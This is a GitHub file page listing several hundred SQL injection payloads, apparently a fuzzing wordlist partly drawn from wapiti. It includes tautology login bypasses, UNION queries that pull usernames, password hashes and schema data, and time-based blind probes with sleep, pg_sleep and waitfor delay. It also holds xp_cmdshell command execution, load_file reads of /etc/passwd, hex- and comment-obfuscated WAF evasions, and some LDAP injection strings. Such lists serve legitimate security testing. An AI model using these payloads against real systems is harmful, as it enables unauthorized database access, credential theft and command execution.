Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
449 lines (448 sloc) 9.86 KB
 or 1=1 --
 or 3=3 --
(select top 1
--
-- &password=
UNION ALL SELECT
UNION SELECT
and 1 in (select var from temp)--
and 1=( if((load_file(char(110,46,101,120,11 ...
and 1=1
and 2=0
and 2=0#mysql
and 2=0-- oracle_mysql
and 2=2#mysql
and 2=2-- oracle_mysql
and USER=USER
and user()=user()
group by userid having 1=1--
having 1=1--
or ''='
or '1'='1
or '1'='1'--
or '7659'='7659
or 'a'='a
or 'something' = 'some'+'thing'
or 'text' = n'text'
or 'text' > 't'
or 'unusual' = 'unusual'
or 'whatever' in ('whatever')
or (EXISTS)
or 0=0 #
or 0=0 #"
or 0=0 --
or 1 --'
or 1 in (select @@version)--
or 1/*
or 1=1
or 1=1 /*
or 1=1 or ""=
or 1=1 or ''='
or 1=1--
or 2 > 1
or 2 between 1 and 3
or 2=2
or 3=3
or a = a
or a=a
or a=a--
or benchmark(10000000,MD5(1))#
or pg_sleep(__TIME__)--
or sleep(__TIME__)#
or sleep(__TIME__)='
or username like char(37);
select * from information_schema.tables--
select name from syscolumns where id = (sele ...
union all select @@version--
union select
union select * from users where login = char ...
union select 1,load_file('/etc/passwd'),1,1,1;
!
" or "a"="a
" or 0=0 --
" or 1=1#
" or 1=1--
" or benchmark(10000000,MD5(1))#
" or isNULL(1/0) /*
" or pg_sleep(__TIME__)--
" or sleep(__TIME__)#
") or benchmark(10000000,MD5(1))#
") or pg_sleep(__TIME__)--
") or sleep(__TIME__)="
")) or benchmark(10000000,MD5(1))#
")) or pg_sleep(__TIME__)--
")) or sleep(__TIME__)="
"));waitfor delay '0:0:__TIME__'--
");waitfor delay '0:0:__TIME__'--
";waitfor delay '0:0:__TIME__'--
"a"" or 1=1--"
"a"" or 3=3--"
"hi"") or (""a""=""a"
#
# from wapiti
#mysql
%09
%0a
%0b
%0c
%0d
%20
%20$(sleep%2050)
%20'sleep%2050'
%20or%20''='
%20or%20'x'='x
%20or%201=1
%20or%20x=x
%21
%26
%27%20or%201=1
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%2f**%2funion%2f**%2fselect
%55nion(%53elect 1,2,3)-- -
%7C
%a0
&
&&
'%20OR
'
' (select top 1
' AnD '' like '
' UNION ALL SELECT
' UNION SELECT
' aND '' like '%
' and '' like '
' and '' like '%
' and '' like ''--
' and '2'='0
' and '2'='0'#mysql
' and '2'='0'-- oracle
' and '2'='2
' and '2'='2'#mysql
' and '2'='2'-- oracle
' and 2>1--
' and 2>3--
' or '' like '
' or ''='
' or ''=''--
' or ''=''/*
' or '1'='1
' or '1'='1'--
' or '2'='2
' or (EXISTS)
' or 0=0 #
' or 0=0 --
' or 1 --'
' or 1=1
' or 1=1 or ''='
' or 1=1--
' or 1=1--'
' or 1=1/*
' or 3=3
' or a=a--
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
'#mysql
'%20or%20''='
'%20or%20'x'='x
'%20or%201=1
') and ('x'='x
') or ('a'='a
')%20or%20('x'='x
'/*ora_mysql*/and/**/'2'='0
'/*ora_mysql*/and/**/'2'='2
'/*ora_mysql*/or/**/'2'='2
'; exec master..xp_cmdshell
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'; exec xp_regread
'hi' or 'x'='x';
'or''='
'or'='or'
'sqlattempt1
'test
'test--
'||UTL_HTTP.REQUEST
(
(sqlattempt2)
(sqlvuln)
(||6)
)
) and (1=1
) or ('a'='a
) or (a=a
) or benchmark(10000000,MD5(1))#
) or pg_sleep(__TIME__)--
) or sleep(__TIME__)='
) union select * from information_schema.tables;
)%20or%20('x'='x
)) or benchmark(10000000,MD5(1))#
)) or pg_sleep(__TIME__)--
)) or sleep(__TIME__)='
));waitfor delay '0:0:__TIME__'--
);waitfor delay '0:0:__TIME__'--
*
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
+#uNiOn+#sEleCt
+sqlvuln
+un/**/ion+se/**/lect
+union+distinctROW+select+
,@variable
-
--
--ora_sqls
--sp_password
-15+(UnI)(oN)+(SeL)(ecT)+
-15+(uNioN)+(sElECt)
/
/*!50000UniON SeLeCt*/
/*!UnIOn*//*!SeLect*/+1,2,3—
/*!u%6eion*/ /*!se%6cect*/
/*!uNIOn*/ /*!SelECt*/
/*!union*/+/*!select*/
/*!union*/+/*!select*/+1,2,3—
/**/
/**//*!12345UNION SELECT*//**/
/**//*!union*//**//*!select*//**/
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3—
/**/UNION/**//*!50000SELECT*//**/
/**/or/**/1/**/=/**/1
/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
/*--*/union/*--*/select/*--*/
/*ora_mysql*/and/**/2=0
/*ora_mysql*/and/**/2=2
/*select*/
//
//*
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=1+union+(select'1',concat(login,hash)from+users)
0
0 or 1=1
0x730065006c0065006300740020004000400076006500 ...
0x770061006900740066006F0072002000640065006C00 ...
0x77616974666F722064656C61792027303A303A313027 ...
1 or 1=1
1 or benchmark(10000000,MD5(1))#
1 or pg_sleep(__TIME__)--
1 or sleep(__TIME__)#
1 waitfor delay '0:0:10'--
1) or benchmark(10000000,MD5(1))#
1) or pg_sleep(__TIME__)--
1) or sleep(__TIME__)#
1)) or benchmark(10000000,MD5(1))#
1)) or pg_sleep(__TIME__)--
1)) or sleep(__TIME__)#
1;(load_file(char(47,101,116,99,47,112,97,115, ...
1;SELECT%20*
1e100
2 or 2=2
2' or '2'='2
21 %
23 OR 1=1
26 %
28 %
29 %
3.10E+17
999999999999999999
; begin declare @var varchar(8000) set @var=' ...
; exec ('sel' + 'ect us' + 'er')
; exec master..xp_cmdshell
; exec master..xp_cmdshell 'ping 172.10.1.255'--
; exec xp_regread
; execute immediate 'sel' || 'ect us' || 'er'
; or '1'='1'
;waitfor delay '0:0:__TIME__'--
<
<<
<>
<>"'%;)(&+
=
>
>>
?
?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/
?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
?id=15+/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/+1,version(),3,4,5,6,7--
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,
@
@var select @var as var into temp end --
@variable
ID=66+UnIoN+aLL+SeLeCt+1,2,3,4,5,6,7,(SELECT+concat(0x3a,id,0x3a,password,0x3a)+FROM+information_schema.columns+WHERE+table_schema=0x6334706F645F666573746976616C5F636D73+AND+table_name=0x7573657273),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
PRINT
PRINT @@variable
REVERSE(noinu)+REVERSE(tceles)
SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61)) in xml way
SELECT*FROM(test)WHERE(name)IN(_ucs2 0x01df010e004d00cf0148);
\
\x27UNION SELECT
^
`
a'
a' or 'a' = 'a
a' or 1=1--
a' or 3=3--
a' waitfor delay '0:0:10'--
admin'
admin' or '
admin'#
admin'--
and
anything' OR 'x'='x
as
asc
ascii
benchmark
benchmark(10000000,MD5(1))#
bfilename
bin
char
char%4039%41%2b%40SELECT
column_name
declare @q nvarchar (200) 0x730065006c00650063 ...
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061 ...
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @q nvarchar (4000) select @q =
declare @s varchar (200) select @s = 0x73656c6 ...
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar (8000) select @s = 0x73656c ...
declare @s varchar(200) select @s = 0x77616974 ...
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @s varchar(22) select @s =
delete
desc
distinct
exec sp
exec xp
exec(@s)
exists
field
file
format
handler
having
hex
hi or 1=1 --"
hi or a=a
hi' or 'a'='a
hi' or 'x'='x';
hi' or 1=1 --
hi') or ('a'='a
id=-1 and (select 1)=(Select 0xAA*1000) /*!UNION*/ /*!SELECT*//**/1,2,3,4,5,6—x
id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--
id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.TABLES--
id=-725+UNION+SELECT+1,GROUP_CONCAT(id,0x3a,login,0x3a,password,0x3a,email,0x3a,access_level),3,4,5+FROM+Admin--
id=-725+UNION+SELECT+1,version(),3,4,5--sp_password
id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—
id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
id=1+/**/union/*&id=*/select/*&id=*/1,2,3--
id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
id=1+UNIunionON+SELselectECT 1,2,3—
id=1+UnIOn/**/SeLect 1,2,3—
id=1+un/**/ion+sel/**/ect+1,2,3--
id=1/*!limit+0+union+select+concat_ws(0×3a,table_name,column_name)+from+information_schema.columns*/
id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)
id=10 and 1=0/(select top 1 table_name from information_schema.tables)
if
in
index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)+123
insert
instr
is
is not
left
like
limit
lower
lpad
mid
mod
now()oct
or
or 0=0 #
or 0=0 #"
or 0=0 --
or 1=1
or 1=1 or ""=
or 1=1#
or 1=1--
or a = a
or a=a
or isNULL(1/0) /*
or%201=1
or%201=1 --
ord
order by
order by 1--
password:*/=1--
pg_sleep(__TIME__)--
procedure
regexp
replace
right
rpad
sEleCt
sel<>ect
select
select user from mysql.user where user = 'user' OR mid(password,1,1) like '*'
select user from mysql.user where user = 'user' OR mid(password,1,1) regexp '[*]'
select user from mysql.user where user = 'user' OR mid(password,1,1) rlike '[*]'
select user from mysql.user where user = 'user' OR mid(password,1,1)=unhex('2a')
select user from mysql.user where user = 'user' OR ord(mid(password,1,1))=42
seleselectct
sleep
sqlvuln
sqlvuln;
strcmp
substr
substring
t'exec master..xp_cmdshell 'nslookup www.googl ...
t'exec master..xp_cmdshell 'nslookup www.google.com'--
table_name
table_schema
to_timestamp_tz
truncate
tz_offset
un/**/ion+sel/**/ect+1,2,3—
uni%0bon+se%0blect
uni/**/on sel/**/ect
union
union (/*!/**/ SeleCT */ 1,2,3)
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
union+/*!select*/
update
where
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' OR full_name LIKE '%Bob%
x' or 1=1 or 'x'='y
xor
{
|
||
||'6
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||6
||UTL_HTTP.REQUEST
}
~
ý or 1=1 --
‘ or 1=1 --
‘ or 3=3 --
‘ or 1=1 --
‘ or 3=3 --
;
;show tables;
*,1
You can’t perform that action at this time.